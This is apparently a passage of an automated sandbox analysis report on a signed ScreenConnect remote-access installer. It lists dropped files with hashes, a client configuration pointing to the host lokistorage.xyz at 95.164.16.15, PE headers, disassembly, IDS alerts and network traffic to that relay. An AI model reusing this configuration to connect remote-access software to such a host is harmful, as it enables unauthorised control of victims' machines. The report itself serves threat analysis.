Preview:	.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (20ae101cef0f1acf)\qaw1ymml.newcfg

Process:	C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	559
Entropy (8bit):	5.045176629686393
Encrypted:	false
SSDEEP:	12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOpKozwCDsQAv/vXbAa3xT:2dL9hK6E46YPpO3vH
MD5:	7AF46EAB522933E5E1520729D07C4BB2
SHA1:	2F00C662DBFC5B812E91ED519549C06CA8B654C4
SHA-256:	48863C6092BC5FFAC80A2B14AB321E4178D07E19B0766641EB623746F2CEE8D0
SHA-512:	D093DE30342199D12158ED7DF2C71F9D9D34DD50052DCFB29028387AA371F8E8EAB23653379408C5BF1A6EEAD4F155635A24A26939265C907822B121F3E5D598
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>lokistorage.xyz=95.164.16.15-12%2f11%2f2024%2017%3a40%3a25</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (20ae101cef0f1acf)\user.config (copy)

Process:	C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	559
Entropy (8bit):	5.045176629686393
Encrypted:	false
SSDEEP:	12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOpKozwCDsQAv/vXbAa3xT:2dL9hK6E46YPpO3vH
MD5:	7AF46EAB522933E5E1520729D07C4BB2
SHA1:	2F00C662DBFC5B812E91ED519549C06CA8B654C4
SHA-256:	48863C6092BC5FFAC80A2B14AB321E4178D07E19B0766641EB623746F2CEE8D0
SHA-512:	D093DE30342199D12158ED7DF2C71F9D9D34DD50052DCFB29028387AA371F8E8EAB23653379408C5BF1A6EEAD4F155635A24A26939265C907822B121F3E5D598
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>lokistorage.xyz=95.164.16.15-12%2f11%2f2024%2017%3a40%3a25</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log

Process:	C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1590
Entropy (8bit):	5.363907225770245
Encrypted:	false
SSDEEP:	48:MxHKQ71qHGIs0HKEHiYHKGSI6oPtHTHhAHKKkhHNpv:iq+wmj0qECYqGSI6oPtzHeqKkhtpv
MD5:	E88F0E3AD82AC5F6557398EBC137B0DE
SHA1:	20D4BBBE8E219D2D2A0E01DA1F7AD769C3AC84DA
SHA-256:	278AA1D32C89FC4CD991CA18B6E70D3904C57E50192FA6D882959EB16F14E380
SHA-512:	CA6A7AAE873BB300AC17ADE2394232E8C782621E30CA23EBCE8FE65EF2E5905005EFD2840FD9310FBB20D9E9848961FAE2873B3879FCBC58F8A6074337D5802D
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture

C:\Windows\Temp\~DF3DF26B988AAF1025.TMP

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.4191022846140333
Encrypted:	false
SSDEEP:	48:I4JupI+xFX4nT5hU74/dnHqcq56AdubSiV0d6S2070B3uQca2iQR6YEwg4pDgYro:JJcETXyCKpKfV0d6l/XtQopASfM4
MD5:	60AEFF36A78AC0F71A3B5E6D10E6FC51
SHA1:	25959448496FCB3BA2978C7798CE867A43173215
SHA-256:	991C48FDCCEA7E22D6EEBA2776BE030E24C6E56E34BE88CC244E423395545BB5
SHA-512:	D72F49BE72D506860BEF358B29B20D230492D3C7AB4F8850AEA7B229E055F0C25C6B655CBCD82E89A788745B4BCEE838DFA2E6F5753B305F778EE2ACF2A29234
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF4960D345329FE558.TMP

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.7979120961169852
Encrypted:	false
SSDEEP:	48:s8PhxuRc06WX4MjT5q4/dnHqcq56AdubSiV0d6S2070B3uQca2iQR6YEwg4pDgY8:Dhx18jTcCKpKfV0d6l/XtQopASfM4
MD5:	4CD514A5B548DAE443C6B01354E949BD
SHA1:	1F73C085AD8092FDB2D33924F5F18476DBB72A48
SHA-256:	446064E81894B3AAB928C5648C6897374A8C0F5EEA901350900227FC73D3F33D
SHA-512:	9B79C2F6D7C9345086A7DE8A54FEB04D81FB94E41B54F128438B1C09EA66BEA5AE2A00BB472A7D312A065382519097EBDAF354C442F9357735D3ED2D23A0BA6A
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF4B903C3256E4A301.TMP

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF531D7CF94BDC2141.TMP

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	0.23370948042339865
Encrypted:	false
SSDEEP:	48:42l1DBAdubS3qcq56AdubSiV0d6S2070B3uQca2iQR6YEwg4pDgYrLno4/:429xpKfV0d6l/XtQopASyo
MD5:	41DEFB2A19A485F88F4256A11951975D
SHA1:	EE09858330536351E4269C3B2314CC57C5297FA3
SHA-256:	B0B793858166BEC24F9A0ABC501D2987232F006D79471FEA80CCB342F85A3517
SHA-512:	B9CC563D20E42A3F5DF82FCB806512E46DDF35DA64A9FF1CDABD19CC4FFE2E6AFBF15476783C26190ACC69392A46AA94370D2DC105F04F828573D0FF9BF37446
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF6A2C3B4578F2097B.TMP

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF75CA446E73ADA158.TMP

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF7BF8E49B161B3CBC.TMP

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFBEB9038F3EF21D14.TMP

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.7979120961169852
Encrypted:	false
SSDEEP:	48:s8PhxuRc06WX4MjT5q4/dnHqcq56AdubSiV0d6S2070B3uQca2iQR6YEwg4pDgY8:Dhx18jTcCKpKfV0d6l/XtQopASfM4
MD5:	4CD514A5B548DAE443C6B01354E949BD
SHA1:	1F73C085AD8092FDB2D33924F5F18476DBB72A48
SHA-256:	446064E81894B3AAB928C5648C6897374A8C0F5EEA901350900227FC73D3F33D
SHA-512:	9B79C2F6D7C9345086A7DE8A54FEB04D81FB94E41B54F128438B1C09EA66BEA5AE2A00BB472A7D312A065382519097EBDAF354C442F9357735D3ED2D23A0BA6A
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFDE64EC19D373E552.TMP

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.06905341407124081
Encrypted:	false
SSDEEP:	6:2/9LG7iVCnLG7iVrKOzPLHKOuK3f2WTC9pGyVky6l3X:2F0i8n0itFzDHFbf27DE3X
MD5:	9D5EA7035451AAC4CA73E90ED5A86F65
SHA1:	DB316E571CAC8B49566B2905618852C694566983
SHA-256:	4068F403D71E4543DDD4A72F567D8A2057835E7A78C5B4B7DDA0FB9C03187AE5
SHA-512:	8F55C9D06DB5C6777DB5AFDD5604F5D2B34CF79128BC82924849A1B13881396A132EE2C453AB50D247CCFC9139C9ECBCBB71F157BDDEF103D1E89C501932BF3E
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFE24F2AD9E00675BB.TMP

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.4191022846140333
Encrypted:	false
SSDEEP:	48:I4JupI+xFX4nT5hU74/dnHqcq56AdubSiV0d6S2070B3uQca2iQR6YEwg4pDgYro:JJcETXyCKpKfV0d6l/XtQopASfM4
MD5:	60AEFF36A78AC0F71A3B5E6D10E6FC51
SHA1:	25959448496FCB3BA2978C7798CE867A43173215
SHA-256:	991C48FDCCEA7E22D6EEBA2776BE030E24C6E56E34BE88CC244E423395545BB5
SHA-512:	D72F49BE72D506860BEF358B29B20D230492D3C7AB4F8850AEA7B229E055F0C25C6B655CBCD82E89A788745B4BCEE838DFA2E6F5753B305F778EE2ACF2A29234
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFFA2AD55052BD5D87.TMP

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.4191022846140333
Encrypted:	false
SSDEEP:	48:I4JupI+xFX4nT5hU74/dnHqcq56AdubSiV0d6S2070B3uQca2iQR6YEwg4pDgYro:JJcETXyCKpKfV0d6l/XtQopASfM4
MD5:	60AEFF36A78AC0F71A3B5E6D10E6FC51
SHA1:	25959448496FCB3BA2978C7798CE867A43173215
SHA-256:	991C48FDCCEA7E22D6EEBA2776BE030E24C6E56E34BE88CC244E423395545BB5
SHA-512:	D72F49BE72D506860BEF358B29B20D230492D3C7AB4F8850AEA7B229E055F0C25C6B655CBCD82E89A788745B4BCEE838DFA2E6F5753B305F778EE2ACF2A29234
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFFE8575CA5B2DC581.TMP

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.455094074875908
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	tmpzNIZ0YQ.exe
File size:	5'809'048 bytes
MD5:	451079cd7676e46f571336c768a9e6f0
SHA1:	1270abe5230d5ed13488cd55cd69854baa53b010
SHA256:	29e369f7b7ee09c8b15a8dc133561d4d71e55c100eeff8d7e72d2c6016b179e9
SHA512:	5cece05573bb2f9b2a8c7d92e2ce266f5c78fb6f46e53d07ae33d957df2a2b99338f8cd0eabda50ee15f52ac0ba297cbcecc551b36364adf4088ac444850039d
SSDEEP:	98304:f4s6efPOEnXkHywo+EVhaecMUzG4uc96ob23sf:AfefPFZs6Uruc9XbZ
TLSH:	BF46F101B3D599B9D5BF0678D87A42699A34BC048316C7FF93D4B9293E32BC04E32766
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_..E>`.E>`.E>`.....O>`.....?>`.....]>`..Ee.`>`..Ed.T>`..Ec.Q>`.LF..A>`.[l..F>`.E>a.%>`..Ei.D>`..E..D>`..Eb.D>`.RichE>`........

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x4014ad
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x6377E6AC [Fri Nov 18 20:10:20 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	9771ee6344923fa220489ab01239bdfd

Authenticode Signature

Signature Valid:	true
Signature Issuer:	CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
Signature Validation Error:	The operation completed successfully
Error Number:	0
Not Before, Not After	17/08/2022 01:00:00 16/08/2025 00:59:59
Subject Chain	CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
Version:	3
Thumbprint MD5:	AAE704EC2810686C3BF7704E660AFB5D
Thumbprint SHA-1:	4C2272FBA7A7380F55E2A424E9E624AEE1C14579
Thumbprint SHA-256:	82B4E7924D5BED84FB16DDF8391936EB301479CEC707DC14E23BC22B8CDEAE28
Serial:	0B9360051BCCF66642998998D5BA97CE

Entrypoint Preview

Instruction
call 00007F4AA8CADB2Ah
jmp 00007F4AA8CAD5DFh
push ebp
mov ebp, esp
push 00000000h
call dword ptr [0040D040h]
push dword ptr [ebp+08h]
call dword ptr [0040D03Ch]
push C0000409h
call dword ptr [0040D044h]
push eax
call dword ptr [0040D048h]
pop ebp
ret
push ebp
mov ebp, esp
sub esp, 00000324h
push 00000017h
call dword ptr [0040D04Ch]
test eax, eax
je 00007F4AA8CAD767h
push 00000002h
pop ecx
int 29h
mov dword ptr [004148D8h], eax
mov dword ptr [004148D4h], ecx
mov dword ptr [004148D0h], edx
mov dword ptr [004148CCh], ebx
mov dword ptr [004148C8h], esi
mov dword ptr [004148C4h], edi
mov word ptr [004148F0h], ss
mov word ptr [004148E4h], cs
mov word ptr [004148C0h], ds
mov word ptr [004148BCh], es
mov word ptr [004148B8h], fs
mov word ptr [004148B4h], gs
pushfd
pop dword ptr [004148E8h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [004148DCh], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [004148E0h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [004148ECh], eax
mov eax, dword ptr [ebp-00000324h]
mov dword ptr [00414828h], 00010001h

Rich Headers

Programming Language:

[IMP] VS2008 SP1 build 30729
[IMP] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x129c4	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x16000	0x53747c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x54a600	0x3fd98
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x54e000	0xea8	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x11f20	0x70	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x11e60	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xd000	0x13c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xb1af	0xb200	d9fa6da0baf4b869720be833223490cb	False	0.6123156601123596	data	6.592039633797327	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0xd000	0x6078	0x6200	8b45a1035c0de72f910a75db7749f735	False	0.41549744897959184	data	4.786621464556291	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x14000	0x11e4	0x800	1f4cc86b6735a74429c9d1feb93e2871	False	0.18310546875	data	2.265083745848167	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x16000	0x53747c	0x537600	9031d2d9e81b0f6feb6373861cf5cdaa	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x54e000	0xea8	0x1000	a93b0f39998e1e69e5944da8c5ff06b1	False	0.72265625	data	6.301490309336801	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
FILES	0x163d4	0x85600	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows			0.3967589473992502
FILES	0x9b9d4	0x1a4400	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows			0.5110044479370117
FILES	0x23fdd4	0x1ac00	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows			0.44113244742990654
FILES	0x25a9d4	0x2f1320	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows			0.9811086654663086
FILES	0x54bcf4	0x1600	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows			0.3908025568181818
RT_MANIFEST	0x54d2f4	0x188	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5892857142857143

Imports

DLL	Import
mscoree.dll	CorBindToRuntimeEx
KERNEL32.dll	GetModuleFileNameA, DecodePointer, SizeofResource, LockResource, LoadLibraryW, LoadResource, FindResourceW, GetProcAddress, WriteConsoleW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, FlushFileBuffers, HeapReAlloc, HeapSize, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwind, GetLastError, SetLastError, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, RaiseException, GetStdHandle, WriteFile, CreateFileW, MultiByteToWideChar, WideCharToMultiByte, ExitProcess, GetModuleHandleExW, GetACP, CloseHandle, HeapAlloc, HeapFree, FindClose, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, SetStdHandle, GetFileType, GetStringTypeW, GetProcessHeap
OLEAUT32.dll	VariantInit, SafeArrayUnaccessData, SafeArrayCreateVector, SafeArrayDestroy, VariantClear, SafeArrayAccessData

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-12T18:40:32.519144+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	20.12.23.50	443	192.168.2.9	49709	TCP
2024-11-12T18:41:10.092641+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	20.12.23.50	443	192.168.2.9	49712	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 12, 2024 18:40:25.887732029 CET	49708	8041	192.168.2.9	95.164.16.15
Nov 12, 2024 18:40:25.892728090 CET	8041	49708	95.164.16.15	192.168.2.9
Nov 12, 2024 18:40:25.892834902 CET	49708	8041	192.168.2.9	95.164.16.15
Nov 12, 2024 18:40:27.315721989 CET	49708	8041	192.168.2.9	95.164.16.15
Nov 12, 2024 18:40:27.322499990 CET	8041	49708	95.164.16.15	192.168.2.9
Nov 12, 2024 18:40:27.558588982 CET	8041	49708	95.164.16.15	192.168.2.9
Nov 12, 2024 18:40:27.601705074 CET	49708	8041	192.168.2.9	95.164.16.15
Nov 12, 2024 18:40:27.606553078 CET	8041	49708	95.164.16.15	192.168.2.9
Nov 12, 2024 18:40:27.909338951 CET	8041	49708	95.164.16.15	192.168.2.9
Nov 12, 2024 18:40:27.910300970 CET	8041	49708	95.164.16.15	192.168.2.9
Nov 12, 2024 18:40:27.910460949 CET	49708	8041	192.168.2.9	95.164.16.15
Nov 12, 2024 18:40:29.999551058 CET	49708	8041	192.168.2.9	95.164.16.15
Nov 12, 2024 18:40:29.999598026 CET	49708	8041	192.168.2.9	95.164.16.15
Nov 12, 2024 18:40:30.004740953 CET	8041	49708	95.164.16.15	192.168.2.9
Nov 12, 2024 18:40:30.004755974 CET	8041	49708	95.164.16.15	192.168.2.9
Nov 12, 2024 18:40:30.004851103 CET	8041	49708	95.164.16.15	192.168.2.9
Nov 12, 2024 18:40:30.004861116 CET	8041	49708	95.164.16.15	192.168.2.9
Nov 12, 2024 18:40:30.004947901 CET	8041	49708	95.164.16.15	192.168.2.9
Nov 12, 2024 18:40:30.005002022 CET	8041	49708	95.164.16.15	192.168.2.9
Nov 12, 2024 18:41:30.019479990 CET	49708	8041	192.168.2.9	95.164.16.15
Nov 12, 2024 18:41:30.025374889 CET	8041	49708	95.164.16.15	192.168.2.9

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 12, 2024 18:40:25.809832096 CET	51138	53	192.168.2.9	1.1.1.1
Nov 12, 2024 18:40:25.854595900 CET	53	51138	1.1.1.1	192.168.2.9

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 12, 2024 18:40:25.809832096 CET	192.168.2.9	1.1.1.1	0xee54	Standard query (0)	lokistorage.xyz	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 12, 2024 18:40:25.854595900 CET	1.1.1.1	192.168.2.9	0xee54	No error (0)	lokistorage.xyz		95.164.16.15	A (IP address)	IN (0x0001)	false

Target ID:	0
Start time:	12:40:15
Start date:	12/11/2024
Path:	C:\Users\user\Desktop\tmpzNIZ0YQ.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\tmpzNIZ0YQ.exe"
Imagebase:	0xc20000
File size:	5'809'048 bytes
MD5 hash:	451079CD7676E46F571336C768A9E6F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
